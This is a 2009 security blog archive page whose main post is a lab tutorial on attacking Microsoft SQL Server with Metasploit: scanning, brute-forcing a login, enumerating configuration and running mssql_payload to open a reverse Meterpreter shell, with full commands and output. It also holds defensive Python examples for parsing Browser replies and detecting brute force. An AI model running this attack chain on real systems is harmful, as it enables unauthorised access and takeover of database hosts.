
November 2009 Archives

PaulDotCom Security Weekly - Episode 177 Part 1 - November 27, 2009


The PaulDotCom crew interview Chris Hoff and talk about security in the real world, the cloud, cigars, and martial arts!

TheHoff.png
"Don't Hassle The Hoff"

Full Show Notes

Direct Audio Download

Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez

Audio Feeds:

The Quest for a Shmoocon Barcode


Tomorrow, December 1, 2009 at noon the second round of Shmoocon ticket sales begins. I got lucky and scored my ticket in round 1. But I made several mistakes when trying to register and almost missed out. I thought I might throw out a few pointers based on my experience in round one for those of you who are going to try to register tomorrow.

First here is a general overview of the process in round one. At noon, tickets went on sale at the www.shmoocon.org website. On the registration page I was asked for an email address and how many tickets I wanted. I was allowed to register for either 1 or 2 tickets. If the number of tickets selected was available, I was taken to a site where I entered a CAPTCHA to verify I'm human. If I entered the CAPTCHA correctly, I was given a code that can be used to register. With the code in hand, I could relax and come back later to register for the barcode. An hour after the initial registration started, they turned on a page where I could use the code to register.

Last time, tickets appeared to be gone within the first 15 minutes, but there were actually tickets in the system for about an hour. With that in mind, here are my tips:

- Be ready at 12:00 noon EST.
- Start at the registration page
- Don't just sit at the top of the registration page refreshing. The link may not be at the top! It may be anywhere on the page including the bottom. I suggest looking through the entire page once registration begins at noon.
- Check for updates and communication from the Shmoo Group on both the website's NEWS section and their Twitter feed. In round one, only the news site was updated, but you never know. At 12:00 noon they did post a note on the news site announcing that round one had begun.
- Continue attempting to register from 12:00 noon until you see an announcement on one of the aforementioned sites. They did post a message when all the tickets were gone.
- If it's a tight race, only go for 1 ticket. If you select 2 tickets and only 1 is available you may miss your chance at that one ticket.
- Don't be discouraged by error messages or messages telling you that all the tickets are sold out until you see a note from the group saying all tickets are gone. In round 1, tickets were still available but I repeatedly got a message telling me they were all gone and to come back on December 1st. I continued trying and did get a ticket after being told many many times they were sold out.
- Past performance is not an indicator of future results. Everything could change between rounds.

The rest of this is my speculation on how I think I lucked into a ticket. It's all conjecture, but it might be helpful. I THINK that several people tried to get creative and register automatically and didn't anticipate the CAPTCHA. As a result, their bots would tie up tickets until some timeout period was reached and then the ticket was added back into the registration system. This resulted in the "All tickets are gone" message appearing until they timed out and were released back into the system. When they were added back into the system the first person, or perhaps the first COUPLE of people to grab the ticket were given the CAPTCHA. The first person to enter the CAPTCHA correctly got the registration code. That leads me to my last tip...

- TYPE FAST

That's it! Good luck tomorrow. See you in DC in February!

PaulDotCom Security Weekly Episode 177 - Video (Stories)


We managed to get the video for the second half of episode 177 where we discuss the stories of the week. The audio on the Skype side was a little quiet (sorry!). Come watch as we broadcast from the workshop and smoke cigars!

Audio release coming soon (better quality audio than the video).

PaulDotCom Security Weekly - Episode 176 Part 2 - November 19, 2009


Paul talks about building a security lab on the cheap, and a SPECIAL GUEST APPEARANCE!!!

fasttrack.png

Full Show Notes

Direct Audio Download

Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez

Audio Feeds:

Attacking MSSQL with Metasploit


Nowadays hacking has shifted from attacking systems to learn how they work, or for the thrill of getting into a system for the sake of the hunt, to attacking them for profit; in fact many companies and states around the world employ hackers to gather information for both political and financial gain. One of the places where most of this information resides is in databases, and one of the most popular databases in enterprises and governments today is Microsoft SQL Server. In this blog post I will cover some of the attacks you can carry out against this system with Metasploit 3.3.

The Microsoft SQL Server product is in fact a suite of products comprising several services such as reporting, integration and others, and it ships in a number of editions depending on the version: MSSQL 2000 has the small and light MSDE edition for desktops, while MSSQL 2005 and 2008 have Express, Web, Standard and Enterprise editions, to name the most popular. In this blog post I will focus mainly on the Database Engine component. MSSQL listens on two ports, TCP 1433 and UDP 1434; additional server instances get a random TCP port, and that port can be obtained through UDP port 1434. It has two authentication methods that can be configured, SQL Authentication and Windows Authentication, which differ in where the account credentials are stored and what policy is applied to the account. In MSSQL 2000, SQL Authentication is one of the most abused ways of gaining access to the database: it does not log authentication attempts by default, credentials are sent in clear text, and by default there is no account lockout or password policy on that version of MSSQL. On the more recent versions, SQL 2005 and SQL 2008, this differs in that the account policy of the Windows host where the Database Engine runs is applied to SQL accounts, but I have seen DBAs (Database Administrators) disable the policy checks for SQL accounts in production environments even on the latest versions. Another drawback of SQL Authentication is the presence of the SA account: it runs as sysadmin on the Database Engine and, through the stored procedures on MSSQL, it can execute commands against the host OS under the privileges of the account the Database Engine runs as. As you can see, using Windows Authentication, and making sure developers use Windows accounts, is the way to go when hardening a MS SQL system.

One important note is that when the server is set for SQL Authentication it will also authenticate Windows users; this is known as Mixed Mode. In MSSQL 2000 and 2005 the local Administrators group is given the sysadmin role by default, while on MSSQL 2008 only the local Administrator account is given that permission. On MSSQL clusters the service account for the Database Engine has to be a domain account, and in many installations I have seen this account be a member of the Domain Administrators group. This information can be of great use when doing post exploitation on a MSSQL host. Another important aspect of MSSQL systems is that they come with a large number of stored procedures that permit command execution on the host, modification of the host's registry, file manipulation, sending emails and many other functions as "features", making the post exploitation side of a MSSQL attack a very interesting one.

So let's start by finding all hosts running MSSQL database instances on a network. For this Metasploit has an auxiliary module called mssql_ping; below you will see how to use this module and the options it offers from an msfconsole window.


msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > info

Name: MSSQL Ping Utility
Version: 6479
License: Metasploit Framework License (BSD)

Provided by:
MC <mc@metasploit.com>

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HEX2BINARY /home/carlos/framework3/trunk/data/exploits/mssql/h2b no The path to the hex2binary script on the disk
MSSQL_PASS no The password for the specified username
MSSQL_USER sa no The username to authenticate as
RHOSTS yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the MSSQL instance for information.

msf auxiliary(mssql_ping) > show advanced

Module advanced options:

Name : CHOST
Current Setting:
Description : The local client address

Name : CPORT
Current Setting:
Description : The local client port

Name : ConnectTimeout
Current Setting: 10
Description : Maximum number of seconds to establish a TCP connection

Name : Proxies
Current Setting:
Description : Use a proxy chain

Name : SSL
Current Setting: false
Description : Negotiate SSL for outgoing connections

Name : SSLVersion
Current Setting: SSL3
Description : Specify the version of SSL that should be used (accepted: SSL2,
SSL3, TLS1)

Name : ShowProgress
Current Setting: true
Description : Display progress messages during a scan

Name : ShowProgressPercent
Current Setting: 10
Description : The interval in percent that progress should be shown



The two options we need are RHOSTS and THREADS. Let's set them and run the module against the network in my lab.

msf auxiliary(mssql_ping) > set RHOSTS 192.168.1.1/24
RHOSTS => 192.168.1.1/24
msf auxiliary(mssql_ping) > set THREADS 10
THREADS => 10
msf auxiliary(mssql_ping) > run

[*] Scanned 026 of 256 hosts (010% complete)
[*] Scanned 052 of 256 hosts (020% complete)
[*] Scanned 077 of 256 hosts (030% complete)
[*] SQL Server information for 192.168.1.108:
[*] tcp = 1433
[*] Version = 9.00.1399.06
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] ServerName = DBSQL2K501
[*] Scanned 103 of 256 hosts (040% complete)
[*] Scanned 128 of 256 hosts (050% complete)
[*] SQL Server information for 192.168.1.156:
[*] tcp = 1433
[*] Version = 10.0.1600.22
[*] InstanceName = MSSQLSERVER
[*] IsClustered = No
[*] ServerName = DBSQL2K801
[*] Scanned 155 of 256 hosts (060% complete)
[*] Scanned 180 of 256 hosts (070% complete)
[*] Scanned 205 of 256 hosts (080% complete)
[*] Scanned 232 of 256 hosts (090% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mssql_ping) >


As can be seen, two servers were found. I always like to corroborate my findings with other tools so I can be sure I'm targeting the correct hosts and the correct versions; for this we will use the nmap port scanner with one of its NSE scripts.

carlos@loki:~$ sudo nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156

Starting Nmap 5.10BETA1 ( http://nmap.org ) at 2009-11-26 21:25 AST
NSE: Script Scanning completed.
Nmap scan report for 192.168.1.108
Host is up (0.00071s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
123/udp open|filtered ntp
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
1434/udp open ms-sql-m
| ms-sql-info: ServerName;DBSQL2K501;InstanceName;TESTLABINST;IsClustered;No;Version;9.00.1399.06;tcp;1033;;
| Server name: DBSQL2K501
| Server version: 9.00.1399.06 (RTM)
| Instance name: MSSQLSERVER
| TCP Port: 1433
| Could not retrieve actual version information
| Instance name: TESTLABINST
| TCP Port: 1033
|_ Could not retrieve actual version information
4500/udp open|filtered nat-t-ike
MAC Address: 00:0C:29:1B:83:F5 (VMware)

Nmap scan report for 192.168.1.156
Host is up (0.00073s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
123/udp open|filtered ntp
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
1434/udp open ms-sql-m
| ms-sql-info: Discovered Microsoft SQL Server
| Server name: DBSQL2K801
| Server version: 10.0.1600.22
| Instance name: MSSQLSERVER
| TCP Port: 1433
| Could not retrieve actual version information
| Instance name: TESTINST
| TCP Port: 1123
|_ Could not retrieve actual version information
4500/udp open|filtered nat-t-ike
MAC Address: 00:0C:29:38:20:33 (VMware)

Nmap done: 2 IP addresses (2 hosts up) scanned in 2.79 seconds
carlos@loki:~$


As can be seen from the nmap scan there is a second instance on each of the hosts. One special note: when you run nmap with the ms-sql-info NSE script, the scan must be a UDP scan and nmap must be run as root. Another way is to use Nessus in command line mode with plugin ID 10674.
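
Both mssql_ping and ms-sql-info get their data from the SQL Server Browser service on UDP 1434, and the raw `ms-sql-info:` line in the nmap output above is the Browser's reply verbatim: key;value pairs separated by semicolons, one instance per `;;`-terminated group. The Python below is an added example, not code from the original post, from Metasploit or from nmap. It parses such a reply into per-instance records and names the product behind each version number, which is what you want when inventorying which instances a subnet is actually advertising (and on which non-default ports). The framing bytes (type 0x05 followed by a 16-bit little-endian length) follow the published SQL Server Resolution Protocol specification; the instance data in the sample is copied from the nmap output above, while the sample packet itself is constructed here.

```python
"""Parse SQL Server Browser (SSRP, [MC-SQLR]) responses into instance records.

Added example for this post; not code from the post, Metasploit or nmap.
Wire format per the SSRP specification:
  SVR_RESP  = RESP_TYPE (0x05) | RESP_SIZE (uint16 little-endian) | RESP_DATA
  RESP_DATA = "key;value;key;value;...;;" repeated once per instance
"""
import struct
from typing import Dict, List

SVR_RESP_TYPE = 0x05

# Major version number -> marketed product name (10.50 would be 2008 R2)
PRODUCT_BY_MAJOR = {"8": "SQL Server 2000", "9": "SQL Server 2005", "10": "SQL Server 2008"}

# Instance data copied from the nmap ms-sql-info output in the post; the
# packet framing around it is constructed for this example.
SAMPLE_RESP_DATA = (
    "ServerName;DBSQL2K501;InstanceName;MSSQLSERVER;IsClustered;No;"
    "Version;9.00.1399.06;tcp;1433;;"
    "ServerName;DBSQL2K501;InstanceName;TESTLABINST;IsClustered;No;"
    "Version;9.00.1399.06;tcp;1033;;"
)


def build_sample_response(resp_data: str) -> bytes:
    """Frame RESP_DATA the way the Browser service does, for offline testing."""
    body = resp_data.encode("ascii")
    return bytes([SVR_RESP_TYPE]) + struct.pack("<H", len(body)) + body


def parse_ssrp_response(packet: bytes) -> List[Dict[str, str]]:
    """Return one dict per advertised instance; raise ValueError on a bad packet."""
    if len(packet) < 3 or packet[0] != SVR_RESP_TYPE:
        raise ValueError("not an SSRP SVR_RESP message")
    (size,) = struct.unpack_from("<H", packet, 1)
    data = packet[3:3 + size]
    if len(data) != size:
        raise ValueError("truncated SSRP response: header promises %d bytes" % size)
    instances = []
    for group in data.decode("ascii", errors="replace").split(";;"):
        fields = group.split(";")
        # Keys sit at even offsets, values at odd ones; a dangling odd field is
        # malformed and is dropped by zip() instead of crashing the parser.
        record = {k: v for k, v in zip(fields[0::2], fields[1::2]) if k}
        if record:
            instances.append(record)
    return instances


def is_valid_response(packet: bytes) -> bool:
    """True when the packet parses as an SSRP reply, False otherwise."""
    try:
        parse_ssrp_response(packet)
        return True
    except ValueError:
        return False


def product_name(version: str) -> str:
    """Map a Browser-reported version such as 9.00.1399.06 to a product name."""
    major = version.split(".", 1)[0]
    return PRODUCT_BY_MAJOR.get(major, "unknown SQL Server build %s" % version)


def summarize(instances: List[Dict[str, str]]) -> List[str]:
    """One inventory line per instance: server\\instance, TCP port, product."""
    lines = []
    for inst in instances:
        version = inst.get("Version", "?")
        lines.append("%s\\%s tcp/%s %s (%s)" % (
            inst.get("ServerName", "?"), inst.get("InstanceName", "?"),
            inst.get("tcp", "dynamic/unknown"), product_name(version), version))
    return lines


if __name__ == "__main__":
    packet = build_sample_response(SAMPLE_RESP_DATA)
    for line in summarize(parse_ssrp_response(packet)):
        print(line)
```

Feeding it a captured Browser reply from the wire instead of the constructed sample is a one-line change; the parser itself only trusts the declared length and refuses anything that does not start with the 0x05 response type.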

carlos@loki:/opt/nessus/bin$ sudo ./nessuscmd -i 10674 192.168.1.0/24 --max-hosts 25
Starting nessuscmd 4.0.2
Scanning '192.168.1.0/24'...

+ Host 192.168.1.1 is up
+ Host 192.168.1.2 is up
+ Results found on 192.168.1.108 :
- Port ms-sql-m (1434/udp)
[i] Plugin ID 10674
| A 'ping' request returned the following information about the remote
| SQL instances :
|
|
| ServerName : DBSQL2K501
| InstanceName : MSSQLSERVER
| IsClustered : No
| Version : 9.00.1399.06
| tcp : 1433
|
|
| ServerName : DBSQL2K501
| InstanceName : TESTLABINST
| IsClustered : No
| Version : 9.00.1399.06
| tcp : 1033
|
|

+ Results found on 192.168.1.156 :
- Port ms-sql-m (1434/udp)
[i] Plugin ID 10674
| A 'ping' request returned the following information about the remote
| SQL instances :
|
|
| ServerName : DBSQL2K801
| InstanceName : MSSQLSERVER
| IsClustered : No
| Version : 10.0.1600.22
| tcp : 1433
|
|
| ServerName : DBSQL2K801
| InstanceName : TESTINST
| IsClustered : No
| Version : 10.0.1600.22
| tcp : 1123
|
|

+ Host 192.168.1.157 is up
+ Host 192.168.1.179 is up
+ Host 192.168.1.194 is up
+ Host 192.168.1.232 is up
+ Host 192.168.1.239 is up
+ Host 192.168.1.245 is up
carlos@loki:/opt/nessus/bin$


As can be seen, each tool gives a different level of information, but I have found that one of the fastest ways is to use Microsoft's own tools: the Microsoft SQL Server Management Studio that comes as part of MS SQL 2005 and MS SQL 2008 is one of the fastest at finding MSSQL machines on the same subnet, and it also helps in identifying any other MS SQL services that might be available, something the other tools do not detect or look for.

We start by bringing up Microsoft SQL Server Management Studio and, in the login box, choosing to browse for more servers than the local ones.

image

On the next screen we select the Network Servers tab, and there we will see what it discovered.

image

Now for our next attack we will do a brute force attack, but first we have to find out if the servers are configured for SQL Authentication, and here Management Studio comes into play again: we can select a server, give it bogus credentials, and the error message we get back will tell us whether it is.

image

When we get a message saying the user is not associated with a trusted SQL Server connection, it means there is a mismatch of authentication protocol, telling us that the server does not support SQL Authentication. If SQL Authentication is enabled, the message will be a plain login failed message.

image

Now that we know which server to attack with the brute force we can choose the SA account, but since this server is a MS SQL 2008 we know SA is disabled by default, so we might have to try another account if SA fails. In our case we will assume we got the user meta from an IIS 500 error. In Metasploit we load the brute force login module for MS SQL:

msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login
msf auxiliary(mssql_login) > info

Name: MSSQL Login Utility
Version: 7185
License: Metasploit Framework License (BSD)

Provided by:
MC <mc@metasploit.com>

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HEX2BINARY /home/carlos/framework3/trunk/data/exploits/mssql/h2b no The path to the hex2binary script on the disk
MSSQL_PASS no The password for the specified username
MSSQL_PASS_FILE no A dictionary of passwords to perform a bruteforce attempt
MSSQL_USER sa no The username to authenticate as
RHOSTS yes The target address range or CIDR identifier
RPORT 1433 yes The target port
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the MSSQL instance for a specific
user/pass (default is sa with blank).


We have to give it our target host in the RHOSTS variable, the username to test in MSSQL_USER and the dictionary file in MSSQL_PASS_FILE. The THREADS value will depend on the network connection and the load on the target; for this example I will leave it as is, but I tend to start with 50 and then reduce it in increments of 5 if I get any errors.

msf auxiliary(mssql_login) > set MSSQL_USER meta
MSSQL_USER => meta
msf auxiliary(mssql_login) > set MSSQL_PASS_FILE /tmp/dict.txt
MSSQL_PASS_FILE => /tmp/dict.txt
msf auxiliary(mssql_login) > set RHOSTS 192.168.1.156
RHOSTS => 192.168.1.156
msf auxiliary(mssql_login) > run

[*] 192.168.1.156:1433 successful logged in as 'meta' with password 'meta'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mssql_login) >
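
The module just ran a wordlist against one login in about a second, and earlier the post pointed out that SQL Server 2000 does not log these attempts by default. SQL Server 2005 and 2008 do record each failure in the ERRORLOG (error 18456 followed by a "Login failed for user" line with the reason and the client address), so on the defending side that is where a run like this shows up. The Python below is an added example, not code from the post or from Metasploit: it parses failed and successful SQL-authentication login lines from an ERRORLOG, groups failures by client address and login, and alerts when a burst exceeds a threshold inside a time window, noting whether a successful login from the same client followed the burst. The ERRORLOG lines are constructed for the example in the format SQL Server 2008 writes; the `meta` login and the lab addresses are the ones from this post.

```python
"""Detect SQL-authentication brute force in a SQL Server ERRORLOG.

Added example for this post (not code from the post or from Metasploit).
SQL Server 2005/2008 log each failed login as error 18456 followed by a
'Login failed for user' line carrying the reason and the client address;
SQL Server 2000 did not log failures by default.  The sample lines below
are constructed in that format.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

_TS = r"(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+Logon\s+"
_TAIL = r" '(?P<user>[^']*)'\..*?\[CLIENT: (?P<client>[^\]]+)\]"
FAILED_LOGIN = re.compile(_TS + r"Login failed for user" + _TAIL)
SUCCESS_LOGIN = re.compile(_TS + r"Login succeeded for user" + _TAIL)

_REASON = "Reason: Password did not match that for the login provided."
_FAIL = "%s Logon       Login failed for user 'meta'. " + _REASON + " [CLIENT: 192.168.1.158]"
SAMPLE_ERRORLOG = "\n".join([
    # Constructed: five rapid failures for 'meta' from the Metasploit host...
    "2009-11-26 21:30:01.12 Logon       Error: 18456, Severity: 14, State: 8.",
    _FAIL % "2009-11-26 21:30:01.12",
    "2009-11-26 21:30:01.45 Logon       Error: 18456, Severity: 14, State: 8.",
    _FAIL % "2009-11-26 21:30:01.45",
    _FAIL % "2009-11-26 21:30:01.78",
    _FAIL % "2009-11-26 21:30:02.10",
    _FAIL % "2009-11-26 21:30:02.43",
    # ...then the guess that worked (only logged when successful-login auditing is on).
    "2009-11-26 21:30:02.77 Logon       Login succeeded for user 'meta'. "
    "Connection made using SQL Server authentication. [CLIENT: 192.168.1.158]",
    # A lone mistake from an admin workstation: must not raise an alert.
    "2009-11-26 21:41:17.05 Logon       Login failed for user 'sa'. "
    "Reason: The account is disabled. [CLIENT: 192.168.1.50]",
])


def parse_events(log_text: str) -> List[Tuple[datetime, str, str, str]]:
    """Return (timestamp, 'failed'|'success', user, client) per login audit line."""
    events = []
    for line in log_text.splitlines():
        kind, match = "failed", FAILED_LOGIN.match(line)
        if not match:
            kind, match = "success", SUCCESS_LOGIN.match(line)
        if not match:
            continue  # error-number lines and everything else are ignored
        ts = datetime.strptime(match.group("ts"), "%Y-%m-%d %H:%M:%S.%f")
        events.append((ts, kind, match.group("user"), match.group("client")))
    return events


def find_bruteforce(log_text: str, threshold: int = 5, window_seconds: int = 60) -> List[Dict]:
    """Alert on >= threshold failures for one (client, user) within the window."""
    failures, successes = defaultdict(list), defaultdict(list)
    for ts, kind, user, client in parse_events(log_text):
        (failures if kind == "failed" else successes)[(client, user)].append(ts)
    window = timedelta(seconds=window_seconds)
    alerts = []
    for (client, user), times in failures.items():
        times.sort()
        j = 0
        for i, start in enumerate(times):
            j = max(j, i)
            # Slide the right edge forward while it stays inside the window.
            while j + 1 < len(times) and times[j + 1] - start <= window:
                j += 1
            if j - i + 1 >= threshold:
                last = times[j]
                alerts.append({
                    "client": client, "user": user, "failures": j - i + 1,
                    "first": start, "last": last,
                    # A success after the burst means the guessing probably worked.
                    "followed_by_success": any(t >= last for t in successes[(client, user)]),
                })
                break  # one alert per (client, user) is enough
    return alerts


if __name__ == "__main__":
    for alert in find_bruteforce(SAMPLE_ERRORLOG):
        print("%(failures)d failed logins for '%(user)s' from %(client)s between "
              "%(first)s and %(last)s; success afterwards: %(followed_by_success)s" % alert)
```

The threshold and window are deliberately parameters: five failures in a minute is a reasonable default for a single login, but the point of the example is the grouping by client and login and the "success after burst" flag, which turns a noisy event into the one worth paging on. Successful-login lines only appear when login auditing is set to record both failed and successful logins, so the flag is informative only where that setting is on.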


Now that we have a username and password, let's enumerate the MSSQL server with the enumeration module:

msf auxiliary(mssql_login) > use auxiliary/admin/mssql/mssql_enum
msf auxiliary(mssql_enum) > info

Name: Microsoft SQL Server Configuration Enumerator
Version: 7226
License: Metasploit Framework License (BSD)

Provided by:
Carlos Perez <carlos_perez@darkoperator.com>

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HEX2BINARY /home/carlos/framework3/trunk/data/exploits/mssql/h2b no The path to the hex2binary script on the disk
MSSQL_PASS no The password for the specified username
MSSQL_USER sa no The username to authenticate as
RHOST yes The target address
RPORT 1433 yes The target port

Description:
This module will perform a series of configuration audits and
security checks against a Microsoft SQL Server database. For this
module to work, valid administrative user credentials must be
supplied.

msf auxiliary(mssql_enum) >


We provide the username and password we found, in addition to the target, and run it:

msf auxiliary(mssql_enum) > set MSSQL_USER meta
MSSQL_USER => meta
msf auxiliary(mssql_enum) > set MSSQL_PASS meta
MSSQL_USER => meta
msf auxiliary(mssql_enum) > set RHOST 192.168.1.156
RHOST => 192.168.1.156
msf auxiliary(mssql_enum) > run

[*] Running MS SQL Server Enumeration...
[*] Auxiliary module execution completed
msf auxiliary(mssql_enum) > set MSSQL_PASS meta
MSSQL_PASS => meta
msf auxiliary(mssql_enum) > run

[*] Running MS SQL Server Enumeration...
[*] Version:
[*] Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86)
[*] Jul 9 2008 14:43:34
[*] Copyright (c) 1988-2008 Microsoft Corporation
[*] Enterprise Edition on Windows NT 5.2 <X86> (Build 3790: Service Pack 2)
[*] Configuration Parameters:
[*] C2 Audit Mode is Not Enabled
[*] xp_cmdshell is Enabled
[*] remote access is Enabled
[*] allow updates is Not Enabled
[*] Database Mail XPs is Not Enabled
[*] Ole Automation Procedures are Not Enabled
[*] Databases on the server:
[*] Database name:master
[*] Databse Files for master:
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\master.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\mastlog.ldf
[*] Database name:tempdb
[*] Databse Files for tempdb:
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\tempdb.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\templog.ldf
[*] Database name:model
[*] Databse Files for model:
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\model.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\modellog.ldf
[*] Database name:msdb
[*] Databse Files for msdb:
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\MSDBData.mdf
[*] C:\Program Files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\DATA\MSDBLog.ldf
[*] System Logins on this Server:
[*] sa
[*] ##MS_SQLResourceSigningCertificate##
[*] ##MS_SQLReplicationSigningCertificate##
[*] ##MS_SQLAuthenticatorCertificate##
[*] ##MS_PolicySigningCertificate##
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] ##MS_AgentSigningCertificate##
[*] NT AUTHORITY\SYSTEM
[*] NT AUTHORITY\NETWORK SERVICE
[*] DBSQL2K801\Administrator
[*] dangerlogin
[*] meta
[*] Disabled Accounts:
[*] sa
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] No Accounts Policy is set for:
[*] dangerlogin
[*] meta
[*] Password Expiration is not checked for:
[*] sa
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] dangerlogin
[*] meta
[*] System Admin Logins on this Server:
[*] sa
[*] NT AUTHORITY\SYSTEM
[*] NT AUTHORITY\NETWORK SERVICE
[*] DBSQL2K801\Administrator
[*] meta
[*] Windows Logins on this Server:
[*] NT AUTHORITY\SYSTEM
[*] NT AUTHORITY\NETWORK SERVICE
[*] DBSQL2K801\Administrator
[*] Windows Groups that can logins on this Server:
[*] No Windows Groups where found with permission to login to system.
[*] Accounts with Username and Password being the same:
[*] meta
[*] Accounts with empty password:
[*] No Accounts with empty passwords where found.
[*] Stored Procedures with Public Execute Permission found:
[*] sp_replsetsyncstatus
[*] sp_replcounters
[*] sp_replsendtoqueue
[*] sp_resyncexecutesql
[*] sp_prepexecrpc
[*] sp_repltrans
[*] sp_xml_preparedocument
[*] xp_qv
[*] xp_getnetname
[*] sp_releaseschemalock
[*] sp_refreshview
[*] sp_replcmds
[*] sp_unprepare
[*] sp_resyncprepare
[*] sp_createorphan
[*] xp_dirtree
[*] sp_replwritetovarbin
[*] sp_replsetoriginator
[*] sp_xml_removedocument
[*] sp_repldone
[*] sp_reset_connection
[*] xp_fileexist
[*] xp_fixeddrives
[*] sp_getschemalock
[*] sp_prepexec
[*] xp_revokelogin
[*] sp_resyncuniquetable
[*] sp_replflush
[*] sp_resyncexecute
[*] xp_grantlogin
[*] sp_droporphans
[*] xp_regread
[*] sp_getbindtoken
[*] sp_replincrementlsn
[*] Instances found on this server:
[*] MSSQLSERVER
[*] TESTINST
[*] Default Server Instance SQL Server Service is running under the privilege of:
[*] NT AUTHORITY\NETWORK SERVICE
[*] Instance TESTINST SQL Server Service is running under the privilage of:
[*] LocalSystem
[*] Auxiliary module execution completed
msf auxiliary(mssql_enum) >


Now we know which stored procedures are enabled, the accounts, whether policy is applied, and a wealth of other information to continue our attack. One critical piece of information is that one of the instances (TESTINST) is running as LocalSystem, so we can get a shell on the system; if it were running as Network Service we would not be able to start our shell. Since nothing beats having a nice Meterpreter shell, let's move from SQL access to a shell on the host with the MSSQL Payload exploit module:

msf exploit(mssql_payload) > info

Name: Microsoft SQL Server Payload Execution
Version: 7236
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)

Provided by:
David Kennedy "ReL1K" <kennedyd013@gmail.com>

Available targets:
Id Name
-- ----
0 Automatic

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
HEX2BINARY /home/carlos/framework3/trunk/data/exploits/mssql/h2b no The path to the hex2binary script on the disk
MSSQL_PASS no The password for the specified username
MSSQL_USER sa no The username to authenticate as
RHOST yes The target address
RPORT 1433 yes The target port

Payload information:

Description:
This module will execute an arbitrary payload on a Microsoft SQL
Server, using the Windows debug.com method for writing an executable
to disk and the xp_cmdshell stored procedure. File size restrictions
are avoided by incorporating the debug bypass method presented at
Defcon 17 by SecureState. Note that this module will leave a
metasploit payload in the Windows System32 directory which must be
manually deleted once the attack is completed.

References:
http://www.osvdb.org/557
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-0402
http://www.securityfocus.com/bid/1281
http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf

msf exploit(mssql_payload) >


We set our values, including our payload, and let the exploit module run:

msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 192.168.1.158
LHOST => 192.168.1.158
msf exploit(mssql_payload) > set RHOST 92.168.1.156
RHOST => 92.168.1.156
msf exploit(mssql_payload) > set MSSQL_USER meta
MSSQL_USER => meta
msf exploit(mssql_payload) > set MSSQL_PASS meta
MSSQL_PASS => meta
msf exploit(mssql_payload) > exploit
msf exploit(mssql_payload) > exploit

[*] Started reverse handler on port 4444
[*] Warning: This module will leave fGDpiveA.exe in the SQL Server %TEMP% directory
[*] Writing the debug.com loader to the disk...
[*] Converting the debug script to an executable...
[*] Uploading the payload, please be patient...
[*] Converting the encoded payload...
[*] Executing the payload...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.156:1708)

meterpreter > sysinfo
Computer: DBSQL2K801
OS : Windows .NET Server (Build 3790, Service Pack 2).
Arch : x86
Language: en_US
meterpreter >


I hope you find this post useful and of help; this is only the basics of what can be done to, and through, a MS SQL server.

Why You Need Echo Mirage


One of the trends I see in malware going forward is more of a focus on obfuscation. If we take Conficker as an example of things to come, the future will be interesting indeed.

What exactly does this mean to you? Well, it means that traditional detection techniques are going to be more and more limited. Even the major AV vendors are starting to see the end of traditional black-list approaches. Also, here at PaulDotCom we have had quite a few posts and discussions on how blacklist AV is broken. We will start seeing more and more malware that uses contextual payloads to generate a "unique" executable for every segment in the infection group. We also will start seeing more and more malware that is targeted to a specific goal.

Please, take a few moments and take a look at clampi. This interesting piece of malware does a pretty good job of obfuscation and is targeted towards capturing financial information.

We will also see more and more malware that is utilizing encrypted channels for communication.  This is something that has been predicted for years, but never materialized as much as it could have.   And why would the attackers go through the extra effort?  What they are doing works perfectly well...for now.

